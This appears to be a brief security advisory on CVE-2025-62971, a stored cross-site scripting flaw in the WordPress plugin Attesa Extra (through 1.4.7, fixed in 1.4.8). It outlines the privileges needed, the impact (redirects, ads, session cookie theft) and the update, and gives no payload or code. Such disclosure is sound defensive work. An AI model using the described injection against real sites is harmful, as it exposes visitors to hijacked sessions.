CVE-2025-62971

Vulnerability

Overview CVE-2025-62971 is a stored cross-site scripting (XSS) vulnerability found in the WordPress plugin Attesa Extra, developed by CrestaProject. The issue arises from improper neutralization of user input during web page generation, allowing an attacker with sufficient privileges to inject arbitrary HTML and JavaScript into the site's pages.

Exploitation

Requirements To exploit this vulnerability, an attacker must have a user role with the required privileges (likely editor or administrator) to input the malicious payload. Successful exploitation requires a privileged user to perform an action such as clicking a malicious link or submitting a crafted form. Once stored, the injected script will execute each time other users, including visitors, load the affected page.

Impact

The attacker can inject arbitrary scripts, leading to actions such as redirecting visitors to malicious sites, displaying unwanted advertisements, or stealing session cookies. This can compromise the integrity of the website and potentially affect its users.

Mitigation

The vulnerability affects Attesa Extra versions from n/a through 1.4.7. The vendor has released version 1.4.8 which fixes the issue. Users are strongly advised to update to this version. As an immediate action, the update should be applied; if that is not possible, a hosting provider or web developer should be contacted for assistance [1].